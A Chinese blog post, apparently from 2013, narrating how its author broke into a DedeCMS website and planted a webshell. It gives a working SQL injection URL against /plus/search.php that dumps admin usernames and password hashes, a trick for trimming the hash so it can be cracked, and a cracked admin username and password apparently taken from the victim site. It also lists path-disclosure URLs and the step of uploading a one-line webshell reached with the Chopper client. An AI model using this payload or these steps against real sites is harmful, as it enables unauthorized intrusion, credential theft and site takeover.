记某一织梦CMS拿webshell

点击查看原图

用/plus/search.php?keyword=astypeArr[111%3D@%60\%27%60%29+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,

12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+%60%23@__admin%60%23@%60\%27%60+]=as

爆出用户名和密码。。。

点击查看原图

得到的是20位的MD5,去掉前3位和最后1位,然后就是16位的MD5值了

xzs123

22e802dc800df6aa0591 →802dc800df6aa059

查询网址:http://cracker.blackbap.org/?do=home

MD5(16位)为 802dc800df6aa059

明文为 QAZqaz123@

好了,登陆 。。。

默认后台:/dede

如果找不到可以试试老版本爆织梦路径的方法:

/include/dialog/select_soft.php

/include/dialog/config.php

include/dialog/select_soft.php?activepath=/st0pst0pst0pst0pst0pst0pst0pst0p

点击查看原图

点击查看原图

新建模块,弄个一句话,菜刀链接,剩下的就不说了。。。

点击查看原图点击查看原图

拿到webshell后:

点击查看原图

posted @ 2013-04-15 23:22:42 kuye 阅读(7148) 评论(0)
发表评论
昵称
邮箱
网址